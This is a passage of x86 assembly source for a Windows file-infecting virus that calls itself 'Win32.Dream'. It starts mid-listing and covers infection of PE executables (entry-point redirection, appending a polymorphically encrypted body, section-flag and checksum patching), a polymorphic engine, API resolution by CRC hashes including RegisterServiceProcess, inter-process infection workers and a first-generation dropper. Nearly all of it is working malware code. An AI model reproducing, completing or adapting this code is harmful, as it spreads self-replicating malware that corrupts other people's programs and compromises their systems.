[ebp+rnd-infect_hlp],edx xor eax,edx call ihcv jc ihax xchg eax,edx call ihcv jc ihax xchg edx,eax ret ihcv:pusha push 4 pop ecx icva:cmp al,' ' jna icvf cmp al,0f0h jnbe icvf cmp al,'"' jz icvf cmp al,"'" jz icvf cmp al,"`" jz icvf cmp al,"\" jz icvf ror eax,8 loop icva test al,0F9h icvf equ $-1 popa ret ihcn:pop eax eax mov ecx,edi sub ecx,eax sub eax,eax mov [esi+org_ep-vstart],eax push ecx sub ecx, p1-hlp1_e+hlp1_e-hlp2_e mov eax,[esp+12+4+4] mov [eax],cx sub esi,vstart-hlp1_e push hlp2_sz pop ecx rep movsb pop eax mov esi,[esp+4] ;buffer sub esi,-528 sub eax,hlp1_s-hlp2_e-21 mov [esi],eax add [esi+4],eax mov esi,edi mov edx,[esp+4+4] mov ecx,[esp+8+4] sub eax,ecx jna ih_free call read cmp [esi+4],"`(RR" ;already infected? jz ih_free mov ebx,[esp+4] lea ecx,[edi+eax] sub ecx,ebx sub ecx,528 mov eax,[esp+4] sub eax,-528 mov edx,[eax] sub edx,ecx sub [eax],edx mov edx,[ebx+12] lea esi,[ebx+528] call write mov esi,[esp+4] push 16 add [esi+12],ecx sub edx,edx pop ecx call write mov edx,[esi+4] sub edx,-55 mov ecx,512 sub esi,-16 call write jmp ih_free spos:pusha sub eax,eax push eax eax edx dword ptr [esp+4*5+8*4] mov eax,0 lpSetFilePointer equ $-4 call eax popa ret read:call spos pusha sub eax,eax push ecx eax call $+9 r_ts:dd ? push ecx esi dword ptr [esp+4*6+8*4] mov eax,0 lpReadFile equ $-4 call eax pop ecx cmp dword ptr [ebp+r_ts-infect_hlp],ecx jnz $+3 test al,0F9h popa ret write:call spos pusha sub eax,eax push eax lea ebx,[ebp+r_ts-infect_hlp] push ebx ecx esi dword ptr [esp+4*5+8*4] mov eax,[esp+4*5+8*4+4+16+8+40] ;ou! what does it mean :) ? call [eax+apiz+4*10] popa ret hlp1_s=$ dw 4 dw offset label1-$-2 db "RR(`USER32.DLL',`EnumWindows',`SU')",0 label1=$ dw 4 size dw 0 p1 = $ db "EnumWindows(`" hlp1_e= $ jmp esp db "',0)",0 hlp2_e = $ hlp2_sz=hlp2_e-hlp1_e ih_free: mov esi,[esp+40+16+4+4] call [esi+apiz+4*1] ;CloseHandle mov eax,0 lpGlobalFree equ $-4 call eax ih_failed: sub esp,-12 end_thread infect_hlp infect_hlp endp dw poly_engine-infect_exe infect_exe proc start_thread infect_exe sub ebx,ebx lea eax,[esi+vbody+vsize] push ebx 80h 3 ebx ebx 0c0000000h eax call [esi+apiz+4*0] ;CreateFileA inc eax jz ie_failed dec eax push eax ebx eax mov eax,0 lpGetFileSize equ $-4 call eax cmp eax,4096 jc ie_close cmp eax,104857600 jnbe ie_close mov [ebp+fsize-infect_exe],eax call $ + 7 db "1",0 push ebx ebx 2 ebx dword ptr [esp+4*5] call [esi+apiz+4*6] ;CreateFileMappingA or eax,eax jz ie_close push eax ebx ebx ebx 4 eax call [esi+apiz+28] ;MapViewOfFile or eax,eax jz ie_mclose push eax cmp word ptr [eax],'ZM' jnz ie_unmap cmp word ptr [eax+MZ_crlc],bx jz ie_tested cmp word ptr [eax+MZ_lfarlc],64 jc ie_unmap ie_tested: mov edi,[eax+MZ_lfanew] add edi,eax cmp dword ptr [edi],4550h jnz ie_unmap mov eax,[esp+4] mov [esi+paramz+(3-1)*4],eax mov eax,[ebp+fsize-infect_exe] mov [esi+paramz+(4-1)*4],eax call other_process, 1 ;active check_infected process cmp [esi+paramz+(4-1)*4],1 jz ie_unmap call other_process, 2 ;active create_infected process mov ax,[edi+NT_FileHeader.FH_Characteristics] test ax,IMAGE_FILE_EXECUTABLE_IMAGE jz ie_unmap test ax,IMAGE_FILE_DLL jnz ie_unmap movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections] dec ecx or ecx,ecx jz ie_unmap imul eax,ecx,IMAGE_SIZEOF_SECTION_HEADER movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader] mov [ebp+ie_section-infect_exe],eax lea ebx,[edx+edi+NT_OptionalHeader.OH_Magic] add ebx,eax mov eax,[ebx+SH_SizeOfRawData] push eax add eax,[ebx+SH_VirtualAddress] lea ecx,[esi+vbody+inf_ep-vstart] mov [ecx],eax mov eax,[edi+NT_OptionalHeader.OH_AddressOfEntryPoint] mov [ecx+5+6],eax call other_process, 5 ;active poly_engine process pop eax add eax,[ebx+SH_PointerToRawData] add eax,[esi+paramz+4*0] add eax,dword ptr [esi+vbody+vsize+260] mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment] add eax,ecx cdq dec eax div ecx mul ecx mov [ebp+align_d-infect_exe],eax call [esi+apiz+4*8] ;UnMapViewOfFile call [esi+apiz+4*1] ;CloseHandle sub ebx,ebx call $ + 7 db "1",0 align_d equ $+1 push 80h ebx 4 ebx dword ptr [esp+4*5] call [esi+apiz+4*6] ;CreateFileMappingA push eax ebx ebx ebx 2 eax call [esi+apiz+4*7] ;thx2 Bumblebee for his help push eax add eax,[eax.MZ_lfanew] xchg eax,edi mov ebx,0 ie_section equ $-4 movzx edx,[edi+NT_FileHeader.FH_SizeOfOptionalHeader] lea eax,[edx+edi+NT_OptionalHeader.OH_Magic] movzx ecx,[edi+NT_FileHeader.FH_NumberOfSections] add eax,ebx ie_change_flag: or [eax.SH_Characteristics],IMAGE_SCN_MEM_WRITE sub eax,IMAGE_SIZEOF_SECTION_HEADER loop ie_change_flag lea eax,[edx+edi+NT_OptionalHeader.OH_Magic] add ebx,eax mov eax,[esi+vbody+inf_ep-vstart] mov [edi+NT_OptionalHeader.OH_AddressOfEntryPoint],eax pusha mov ecx,[esi+paramz+4*0] mov [esp+7*4],ecx mov edi,[ebx+SH_SizeOfRawData] add [esp+7*4],edi add edi,[ebx+SH_PointerToRawData] add edi,[esp+7*4+4] lea esi,[esi+vbody+vsize+260+ci_size] ;poly vbody rep movsb popa mov eax,[esi+paramz+4*0] add eax,[ebx+SH_SizeOfRawData] mov ecx,[edi+NT_OptionalHeader.OH_FileAlignment] add eax,ecx cdq dec eax div ecx mul ecx mov [ebx+SH_SizeOfRawData],eax push eax mov eax,[ebx+SH_VirtualSize] add eax,vsize+68 mov ecx,[edi+NT_OptionalHeader.OH_SectionAlignment] add eax,ecx cdq dec eax div ecx mul ecx pop ecx cmp eax,ecx jnc ie_1 mov eax,ecx ie_1:mov [ebx+SH_VirtualSize],eax add eax,[ebx+SH_VirtualAddress] cmp eax,[edi+NT_OptionalHeader.OH_SizeOfImage] jc ie_2 mov [edi+NT_OptionalHeader.OH_SizeOfImage],eax ie_2:or dword ptr [ebx+SH_Characteristics], \ IMAGE_SCN_CNT_CODE or IMAGE_SCN_MEM_EXECUTE or \ IMAGE_SCN_MEM_WRITE .if dword ptr [edi+NT_OptionalHeader.OH_CheckSum] != 0 mov eax,0 fsize equ $-4 add eax,[esi+paramz+(1-1)*4] mov [esi+paramz+(2-1)*4],eax call other_process, 6 ;active checksum process mov eax,[esi+paramz+(4-1)*4] mov [edi+NT_OptionalHeader.OH_CheckSum],eax .endif push esi mov edi,[ebp+align_d-infect_exe] add edi,[esp+4] lea esi,[esi+vbody+vsize+260] lodsd sub eax,4-tbyte sub edi,eax xchg eax,ecx rep movsb pop esi ie_unmap: call [esi+apiz+4*8] ;UnMapViewOfFile ie_mclose: call [esi+apiz+4*1] ;CloseHandle ie_close: call [esi+apiz+4*1] ;CloseHandle ie_failed: end_thread infect_exe other_process proc pusha mov ecx,[esp+36] mov ebx,esi lea edi,[esi+active+ecx] lea esi,[esi+process+ecx*8] lodsd push eax lodsd mov byte ptr [edi],1 push eax 0 1F0FFFh call [ebx+apiz+4*12] ;OpenProcess pop esi push 40 esi call [ebx+apiz+4*13] ;WaitForSingleObject cmp byte ptr [edi],0 jnz $ - 9 popa ret 4 other_process endp infect_exe endp dw checksum-poly_engine poly_engine proc start_thread poly_engine mov ebx,esi lea esi,[ebx+vbody+vsize] lea edi,[esi+260+ci_size] push ebx edi sub ecx,ecx mov edx,vsize / 2 mov eax,0E8h stosd mov eax,242C8300h stosd mov al,5 stosb @@a:call random test al,1 jnz @@b cmp edx,1 jz @@v sub esi,4 push esi lodsd call @@1_a pop esi dec edx jmp @@k @@b:test al,2 jnz @@c @@v:dec esi dec esi push esi lodsw inc ecx call @@1_a pop esi sub cl,cl jmp @@k @@c:test al,4 jnz @@e call @@1 ;push random value DWORD jc $+7 call @@2 jmp @@l @@e:inc ecx ;push random value WORD call @@1 jc $+7 call @@2 sub cl,cl jmp $+5 @@k:dec edx jz $+4 @@l:jmp @@a mov ax,0E4FFh stosw jmp pe_failed @@1:call random ;push random value test al,1 jnz @@1_d @@1_a:xchg eax,ebx ;push certain value @@1_b:jecxz @@1_c ;push WORD mov al,66h stosb @@1_c:call @@3_a test al,0F9h @@1_d equ $-1 ret @@2:call random ;POP reg32 or ADD ESP,4 test al,1 jnz @@2_b and al,7 cmp al,4 jz @@2 or al,al jz @@2 jecxz @@2_a xchg eax,ebx mov al,66h stosb xchg ebx,eax @@2_a:add al,58h stosb ret @@2_b:mov ax,0C483h stosw mov al,4 jecxz @@2_c mov al,2 @@2_c:stosb ret @@3:xchg eax,ebx ;push certain value in EAX @@3_a:mov al,68h ; in EBX stosb xchg eax,ebx jecxz @@3_b stosw ret @@3_b:stosd ret random: mov eax,0BFF71234h push ecx 33 pop ecx @@r:add eax,eax jnc $+4 xor al,197 loop @@r mov [ebp+random+1-poly_engine],eax pop ecx ret pe_failed: pop ecx ebx sub edi,ecx mov [ebx+paramz+4*0],edi end_thread poly_engine poly_engine endp dw k32_addrs-checksum checksum proc start_thread checksum xchg ebx,esi other_process_mem ebx 3 ;get mem from other process mov ecx,[ebx+paramz+(2-1)*4] sub edx,edx shr ecx,1 @@1:lodsw mov edi,0FFFFh and eax,edi add edx,eax mov eax,edx and edx,edi shr eax,10h add edx,eax loop @@1 mov eax,edx shr eax,10h add ax,dx add eax,[ebp+4] mov [ebx+paramz+(4-1)*4],eax call [ebx+apiz+8*4] ;UnMapViewOfFile call [ebx+apiz+1*4] ;CloseHandle end_thread checksum checksum endp k32_addrs equ this byte x equ dw x lpCreateFile dw x lpCloseHandle dw x lpCreateMutexA dw x lpGetLastError dw x lpReleaseMutex dw x lpExitProcess dw x lpCreateFileMappingA dw x lpMapViewOfFile dw x lpUnMapViewOfFile dw x lpGetSystemDirectory dw x lpWriteFile dw x lpCreateProcessA dw x lpOpenProcess dw x lpWaitForSingleObject dw x lpRegisterServiceProcess dw x lpGetFileSize dw x lpGlobalAlloc dw x lpGlobalFree dw x lpReadFile dw x lpSetFilePointer dw x lpSetErrorMode dw x lpGetCurrentProcessId dw x lpGetVersion dw x lpGetTickCount dw x malloc+63 dw x malloc+51 dw x malloc+106 dw x infect_file-2 count equ ($-k32_addrs)/2 k32_crcs equ this byte dd 08C892DDFh ;CreateFileA dd 068624A9Dh ;CloseHandle dd 020B943E7h ;CreateMutexA dd 087D52C94h ;GetLastError dd 0C449CF4Eh ;ReleaseMutexA dd 040F57181h ;ExitProcess dd 096B2D96Ch ;CreateFileMappingA dd 0797B49ECh ;MapViewOfFile dd 094524B42h ;UnMapViewOfFile dd 0593AE7CEh ;GetSystemDirectoryA dd 021777793h ;WriteFile dd 0267E0B05h ;CreateProcessA dd 033D350C4h ;OpenProcess dd 0D4540229h ;WaitForSingleObject dd 05F31BC8Eh ;RegisterServiceProcess dd 0EF7D811Bh ;GetFileSize dd 083A353C3h ;GlobalAlloc dd 05CDF6B6Ah ;GlobalFree dd 054D8615Ah ;ReadFile dd 085859D42h ;SetFilePointer dd 0A2EB817Bh ;SetErrorMode dd 0EB1CE85Ch ;GetCurrentProcessId dd 042F13D06h ;GetVersion dd 0613FD7BAh ;GetTickCount dd 041D64912h ;OpenFileMappingA dd 0797B49ECh ;MapViewOfFile (other address) dd 019F33607h ;CreateThread dd 00AC136BAh ;Sleep dd 0 process_maps equ this byte dw x infect_file dw x check_infected dw x create_infected dw x infect_hlp dw x infect_exe dw x poly_engine dw x checksum p_number equ ($-process_maps)/2 dw x malloc+95 process_memory struc thandle dd 0 ;returned thread handle by dropper th_mempos dd 0 ;thread body memory position process dd p_number dup (0,0) ;hProcess (Wait), ProcessID (Open) apiz dd count-2 dup (0) ;all API functionz without two last active db p_number dup (0) ;active process (=function) ? paramz dd 8 dup (0) ;process parameters vbody db vsize dup (0) ;virus body (poly, valuez) ; filename dd 260 dup (0) ;name of file (opening, etc) ci_size equ 2*16*(tbyte+tbyte) ;check_infected fpu buffer ; cinfected db ci_size dup(0) ; poly_vbody equ this byte ; ** This is Tasm32 bug, cannot asm through const->proc + dup ends align 4 file_end: db 68 dup(0) mem_end: push 401000h sub esp,vsize jmp vstart fgx:db "E:\X_WIN\ABCD.EXE",0 fg0:mov edx,offset fgx sub eax,eax push eax 80h 3 eax eax 0c0000000h edx call CreateFileA push 0 0 call fg1 db "Win32.Dream - welcome to my world...",0 fg1:call fg2 db "First generation sample",0 fg2:push 0 call MessageBoxA call ExitProcess ;ÄÄÄ´ end of virus ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ end mem_end